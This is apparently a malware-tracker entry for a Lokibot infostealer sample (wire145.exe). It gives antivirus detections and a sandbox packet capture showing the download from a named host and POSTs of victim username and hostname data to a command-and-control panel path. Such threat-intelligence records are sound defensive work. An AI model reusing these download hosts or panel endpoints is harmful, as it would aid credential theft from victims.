wire
Date added: May 15, 2017 2:59 am
Added by: admin
File size: 1,003 KB
Downloads: 269
| Field | Value |
|---|---|
| SHA256 | 6c99dd395a98d20237d05527e84ef8d0d2f9f2a599494ee0632c7bfab2399e33 |
| File name | wire145.exe |
| Detection ratio | 37 / 61 |
| Analysis date | 2017-05-15 02:54:56 UTC ( 0 minutes ago ) |

| Engine | Result | Update |
|---|---|---|
| Kaspersky | Backdoor.Win32.Androm.ngwk | 20170515 |
| McAfee | Artemis!F65BE5A2E77C | 20170515 |
| McAfee-GW-Edition | BehavesLike.Win32.Virus.th | 20170514 |
| eScan | Trojan.GenericKD.5065116 | 20170515 |
| NANO-Antivirus | Trojan.Win32.Androm.eotpjr | 20170514 |
| Palo Alto Networks (Known Signatures) | generic.ml | 20170515 |
| Panda | Trj/GdSda.A | 20170514 |
| Qihoo-360 | Trojan.Generic | 20170515 |
| Rising | Malware.Generic.3!tfe (cloud:DiQytucAL2U) | 20170515 |
| Sophos | Mal/Generic-S | 20170514 |
| Symantec | Infostealer.Lokibot | 20170514 |
| Tencent | Win32.Trojan.Inject.Auto | 20170515 |
| TrendMicro-HouseCall | Suspicious_GEN.F47V0513 | 20170515 |
| VIPRE | Trojan.Win32.Generic!BT | 20170515 |
| Webroot | W32.Trojan.Gen | 20170515 |
| ZoneAlarm by Check Point | Backdoor.Win32.Androm.ngwk | 20170514 |

2017-05-14 21:26:44.615814 IP 192.168.1.102.58035 > 176.62.8.9.80: Flags [P.], seq 0:394, ack 1, win 256, length 394: HTTP: GET /wire145.exe HTTP/1.1
E…Z.@…$ …f.>. …P…\i.0UP….c..GET /wire145.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: lamela.hr
Connection: Keep-Alive
2017-05-14 21:27:25.906564 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…{.@……..f*p…..PV.. M…P…k…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 208
Connection: close
2017-05-14 21:27:26.191163 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 246:454, ack 1, win 256, length 208: HTTP
E…{.@……..f*p…..PV…M…P…S…..’…….ckav.ru..
…u.s.e.r.n.a.m.e.1.3.4…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…………………k……………..0…3.D.F.D.8.1.C.0.7.0.8.A.4.B.C.A.3.3.3.5.F.6.4.B…..dRbP1….
2017-05-14 21:28:04.178218 IP 192.168.1.102.58043 > 8.254.247.46.80: Flags [P.], seq 345:518, ack 24469, win 256, length 173: HTTP: HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
E…&.@….R…f…….P..O…..P…….HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent
Host: download.windowsupdate.com
2017-05-14 21:30:57.454058 IP 192.168.1.102.58053 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…|.@……..f*p…..P”.z.p.PnP…-…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 181
Connection: close